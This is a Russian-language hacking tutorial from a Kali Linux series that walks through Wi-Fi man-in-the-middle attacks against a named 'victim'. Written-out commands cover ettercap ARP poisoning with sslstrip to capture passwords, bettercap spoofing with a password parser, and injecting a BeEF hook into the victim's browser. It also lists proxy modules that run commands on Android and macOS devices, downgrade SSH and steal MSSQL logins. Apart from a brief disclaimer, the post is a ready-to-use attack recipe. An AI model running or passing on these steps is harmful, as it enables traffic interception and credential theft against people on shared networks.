<Обучение от малого до великого> //Хакерство (Крэкерство) #5.⁠⁠

Предупреждение! Всё ниже описанное я не призываю исполнять и повторять, а лишь рассказываю и обучаю, чтобы вы могли знать как собран механизм взлома/обмана/и т.п.

В данной статье будем рассматривать случаи перехвата трафика в Wi-Fi сети.

MITM- человек посередине, посредник. Так называется совокупность методов перехвата трафика, где вы- посредник между роутером и жертвой. Ваш ПК будет служить в роли WiFi-точки тем самым через вас будет проходить весь накопленный трафик.

Я лично не буду рассказывать все методы и комбинации данного вида взлома, т.к. их достаточно много. Мы лично на данном примере разберём два способа. Первый сложный и изживший себя- комбинация ettercap+wireshark. Второй способ относительно новый и удобный. Bettercap- набор инструментов для проведения тестов на безопасность в сети. Так же рассмотрим случай комбинации bettercap+beef. А так же модули для bettercap'a.

I) Начнём с комбинации программ ettercap+wireshark.

root@571:~#ifconfig

root@571:~#echo "1">/proc/sys/net/ipv4/ip_forward

Далее запускаем программу ettercap.

>sniff>unified sniffing>(выбрать сетевую карту (wlan0))

>hosts>scan for hosts

>hosts>host list

>выделить роутер>add to target 1

>выбрать жертву>add to target 2

>MITM>arp poising>галочка напротив пункта "sniff remote connection"

>start>start sniffing

Далее запускаем программу wireshark.

>выбрать сетевую карту (wlan0)>start

root@571:~#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

root@571:~#sslstrip -l 8080

При этом случае в программе ettercap будет выводится вся нужная информация включая пароли жертвы.

Если вы желаете, чтобы вся информация полностью выходила в ваш браузер, можете сделать следующее:

root@571:~#webspy -i wlan0 192.168.1.7(<-вставляете IP-адрес жертвы)

И запускаем браузер.

II) Продолжим изучать методы с программой bettercap.

Bettercap- это более улучшенная версия ettercap, удобная и не хуже оригинала.

Скачать данную программу:

root@571:~#apt-get install bettercap

1)root@571:~#bettercap -X (сниффинг всей сети)

root@571:~#bettercap --proxy -P POST (активируется незащищённая сеть, сниффинг, спуфинг, в общем всё, что нам нужно)

root@571:~#bettercap --sniffer --spoof ARP --proxy-http --proxy-https --custom-parser "password"

...При данном методе будут выводится все данные, где задействованы пароли...

2)root@571:~#./beef (Далее копируем из терминала UI URL со второго абзаца в браузер)

root@571:~#bettercap -I wlan0 -T (Тут IP-жертвы) --proxy-module injectjs (Тут вставляем Hook URL со второго абзаца)

...При этом методе всё будет отображаться на вашем сервере beef открытом в браузере...

III) Так же можно рассмотреть модули для bettercap'a:

Скачать их можно таким образом:

root@571:~#git clone https://github.com/evilsocket/bettercap-proxy-modules.git

Свойства данных модулей:

1)http/androidpwn.rb – Выполнит пользовательскую команду на каждом устройстве Android, эксплуатируя уязвимость "addJavascriptInterface".

2)http/osxsparkle.rb – Выполнит пользовательский исполнимый файл Mach-O OSX на каждой OSX машине, эксплуатируя уязвимость Sparkle Updater https://vulnsec.com/2016/osx-apps-vulnerabilities/.

3)http/beefbox.rb – Похоже на inject*, но специализируется на работе с BeEF framework.

4)http/debug.rb - Отладка HTTP запросов и ответов.

5)http/simple_post.rb – Перехватывает и отображает только выбранные POST поля.

6)http/location_hijacking.rb – Перехватывает заголовок Location с пользовательским URL.

7)http/replace_images.rb – Замена всех изображений на пользовательское.

8)http/rickroll.rb – Вставка iframe с (не)знаменитым видео RickRoll в режиме автовоспроизведения.

9)http/hack_title.rb – Добавляет текст "HACKED" в заголовок веб-сайтов.

10)http/replace_file.rb – Заменяет на лету загружаемые файлы на пользовательские.

TCP прокси модули

11)tcp/debug.rb – Просто скидывает в двоичном формате весь TCP трафик, проходящий через прокси.

12)tcp/sshdowngrade.rb – Если возможно, выполняет атаку понижения SSH 2.x -> 1.x.

13)tcp/mssqlauth.rb - Понижает MSSQL шифрование и захватывает учётные данные входа.

Пример синтаксиса:

root@571:~#bettercap -X --proxy --proxy-module=/home/mial/bin/bettercap-proxy-modules/http/hack_title.rb

IV) И это ещё не все возможные комбинации и функции данной утилиты. Подробно можете почитать в самой программе набрав команду:

root@571:~#bettercap --help

Надеюсь вам понравилось. В дальнейшем буду продолжать опубликовывать статьи по дистрибутиву Kali Linux.

Связаться со мной можно в ВК: https://vk.com/hydra571.